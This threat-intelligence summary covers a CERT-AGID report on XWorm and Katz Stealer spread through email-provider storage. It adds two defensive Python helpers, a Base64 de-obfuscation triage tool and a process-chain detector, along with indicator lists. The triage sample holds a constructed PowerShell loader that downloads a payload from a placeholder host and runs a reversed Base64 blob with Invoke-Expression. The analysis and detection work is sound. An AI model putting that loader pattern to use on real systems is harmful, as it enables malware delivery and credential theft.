XWorm and Katz Stealer Distributed via Email Storage Space

CERT-AGID identified a malspam campaign that abused the storage space of an Italian email provider to host its payloads, delivering the XWorm and Katz Stealer malware through a multi-stage infection chain. The attack hid a payload inside an image using steganography, and relied on obfuscated PowerShell together with MSBuild.exe for execution. #KatzStealer #XWorm #CERTAGID

Keypoints

  • CERT-AGID detected a malspam campaign exploiting storage space linked to an Italian email provider to distribute malware.
  • The initial payload is delivered via a TAR file containing a large obfuscated JavaScript file.
  • Obfuscated PowerShell scripts decode further Base64-encoded payloads hosted within the same mailbox storage.
  • The campaign uses an image steganographically encoded with the Katz Stealer malware payload.
  • Katz Stealer is a malware-as-a-service offering designed to steal user credentials; in this chain it was invoked by a PowerShell function named VAI.
  • A second payload, the XWorm malware, is delivered in Base64-encoded form and injected into memory using MSBuild.exe.
  • CERT-AGID coordinated with the email provider to remove malicious resources and released IoCs to accredited entities.
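The staged PowerShell described above hides each next stage as Base64, in one step stored reversed so that a plain Base64 decoder fails on it. The following triage helper, an added example that is not part of the CERT-AGID write-up, finds long Base64-looking runs in a script, tries both the plain and the reversed decoding, keeps only results that look like text, and recurses into each decoded stage while listing the indicators it contains. The sample stage-1 and stage-2 scripts, the placeholder URL and the indicator list are constructed for the example; they are not the campaign's actual scripts or IoCs.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Strings that make a decoded stage worth an analyst's attention. Drawn from the
# behaviour the write-up describes (download of xwormdotnet.txt, Base64 decoding,
# MSBuild.exe execution, the VAI function); extend for your own environment.
INDICATORS = (
    "FromBase64String", "Invoke-Expression", "IEX", "DownloadString",
    "MSBuild", "xwormdotnet.txt", "VAI",
)

# A run of Base64 alphabet long enough to be a payload rather than an identifier.
# '=' stays inside the match so a reversed blob (padding at the front) can be
# turned back around intact.
_B64_RUN = re.compile(r"[A-Za-z0-9+/=]{40,}")


def _as_text(data: bytes) -> Optional[str]:
    """Return data as text if it plausibly is a script, else None.

    PowerShell -EncodedCommand payloads are UTF-16LE, so a buffer whose odd bytes
    are all NUL is decoded that way; anything else must be ASCII. Only printable
    ASCII plus whitespace passes, which rejects the binary noise that decoding a
    blob in the wrong direction produces.
    """
    if not data:
        return None
    if len(data) % 2 == 0 and not any(data[1::2]):
        text = data.decode("utf-16-le")
    else:
        try:
            text = data.decode("ascii")
        except UnicodeDecodeError:
            return None
    if all(c in "\t\r\n" or 32 <= ord(c) <= 126 for c in text):
        return text
    return None


def decode_blob(blob: str) -> Optional[Tuple[str, str]]:
    """Try plain Base64, then reversed Base64; return (mode, text) or None."""
    for mode, candidate in (("base64", blob), ("reversed-base64", blob[::-1])):
        try:
            raw = base64.b64decode(candidate)
        except (binascii.Error, ValueError):
            continue
        text = _as_text(raw)
        if text is not None:
            return mode, text
    return None


def triage(script: str, depth: int = 0, max_depth: int = 5) -> List[Dict]:
    """Decode every embedded stage, recursively, and report indicators per stage."""
    findings = []
    for match in _B64_RUN.finditer(script):
        decoded = decode_blob(match.group(0))
        if decoded is None:
            continue
        mode, text = decoded
        findings.append({
            "depth": depth,
            "mode": mode,
            "indicators": [i for i in INDICATORS if i in text],
            "text": text,
        })
        if depth < max_depth:
            findings.extend(triage(text, depth + 1, max_depth))
    return findings


# Constructed sample: a stage-2 script shaped like the chain in the write-up,
# wrapped the way the campaign did it (Base64, then string-reversed) inside a
# stage-1 launcher. The URL is a placeholder, not a real indicator.
STAGE2 = (
    "$u = 'https://webmail.example.invalid/storage/xwormdotnet.txt'\n"
    "$b = (New-Object Net.WebClient).DownloadString($u)\n"
    "$p = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b))\n"
    "# ... decoded payload handed to MSBuild.exe for in-memory execution ...\n"
)
_REVERSED = base64.b64encode(STAGE2.encode()).decode()[::-1]
STAGE1 = (
    f"$r = '{_REVERSED}'\n"
    "$s = -join $r[-1..-$r.Length]\n"
    "Invoke-Expression ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))\n"
)

if __name__ == "__main__":
    for finding in triage(STAGE1):
        print(f"depth={finding['depth']} mode={finding['mode']} "
              f"indicators={finding['indicators']}")
```

Feeding the helper the real stage-1 script from a sample gives the analyst the decoded chain without executing any of it; the ASCII/UTF-16 text check is what keeps the reversed-vs-plain guess from producing false stages.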

MITRE Techniques

  • [T1071] Application Layer Protocol – C2 communication performed by XWorm malware with its command and control server. (‘communicates with the C2 server indicated’)
  • [T1027] Obfuscated Files or Information – Use of Base64 obfuscation in PowerShell scripts to conceal payloads. (‘obfuscated PowerShell in Base64’)
  • [T1056] Input Capture – Katz Stealer’s primary function to steal user credentials. (‘its objective is to steal access credentials’)
  • [T1106] Execution through API – The XWorm payload is injected and executed in memory using MSBuild.exe. (‘executed using MSBuild.exe’)
  • [T1560] Archive Collected Data – Initial delivery via a TAR file containing malicious JavaScript. (‘a TAR file containing a JavaScript file’)
  • [T1001] Data Obfuscation – Payload encoded steganographically within an image file. (‘payload is sequentially encoded in the pixels of the image’)
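The execution side of the chain (a JavaScript dropper run by the Windows Script Host, PowerShell stages, and MSBuild.exe used as an in-memory loader) leaves a recognisable parent/child pattern in process-creation telemetry. The classifier below is an added example, not CERT-AGID's detection content; it runs over constructed Sysmon-style events (the paths, process IDs and user name are made up) and flags the steps of the chain while leaving an ordinary developer's MSBuild run alone.

```python
import ntpath
from typing import Dict, List

# Process roles in the chain described in the write-up.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LOADER = "msbuild.exe"
# Arguments a legitimate MSBuild invocation normally carries.
BUILD_EXTENSIONS = (".sln", ".csproj", ".vbproj", ".vcxproj", ".proj")
# Directories where a dropped project file or script would land.
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\downloads\\")


def _exe(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def _from_user_writable(cmd: str) -> bool:
    return any(marker in cmd.lower() for marker in USER_WRITABLE)


def classify(event: dict) -> List[str]:
    """Return the reasons a process-creation event resembles this chain (empty if none)."""
    image, parent = _exe(event.get("Image", "")), _exe(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if image in SCRIPT_HOSTS and ".js" in cmd.lower() and _from_user_writable(cmd):
        reasons.append("script host running JavaScript from a user-writable directory")
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        reasons.append("PowerShell spawned by a script host")
    if image == LOADER:
        if parent in POWERSHELL | SCRIPT_HOSTS:
            reasons.append("MSBuild.exe spawned by a script interpreter")
        if not any(ext in cmd.lower() for ext in BUILD_EXTENSIONS):
            reasons.append("MSBuild.exe without a recognised project file argument")
        if _from_user_writable(cmd):
            reasons.append("MSBuild.exe project file in a user-writable directory")
    return reasons


def scan(events) -> Dict[int, List[str]]:
    """Map ProcessId -> reasons for every event that triggers at least one rule."""
    flagged: Dict[int, List[str]] = {}
    for event in events:
        reasons = classify(event)
        if reasons:
            flagged[event["ProcessId"]] = reasons
    return flagged


# Constructed Sysmon-style (Event ID 1) process-creation events: the three
# stages of the chain followed by two benign processes.
SAMPLE_EVENTS = [
    {"ProcessId": 1101, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\fattura.js"'},
    {"ProcessId": 1102, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Users\alice\AppData\Local\Temp\stage.ps1"},
    {"ProcessId": 1103, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\xw.xml"},
    {"ProcessId": 1104, "Image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.sln /t:Build"},
    {"ProcessId": 1105, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
```

The rules deliberately key on the relationship between processes and on where the project file lives rather than on file names, since the TAR, JavaScript and text file names in a campaign like this change between waves while the wscript -> powershell -> MSBuild.exe shape does not.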

Indicators of Compromise

  • [URL] Malicious download locations hosted on an Italian email provider’s webmail storage – containing the TAR file, the steganographic image, and xwormdotnet.txt.
  • [File Name] Malicious files – xwormdotnet.txt (Base64-encoded XWorm payload), downloaded steganographic image (~2.6MB) containing Katz Stealer.
  • [Payload] Base64 and reversed Base64 encoded PowerShell scripts used for multi-stage payload delivery.


Read more: https://cert-agid.gov.it/news/xworm-e-katz-stealer-distribuiti-tramite-spazio-di-storage-di-posta-elettronica/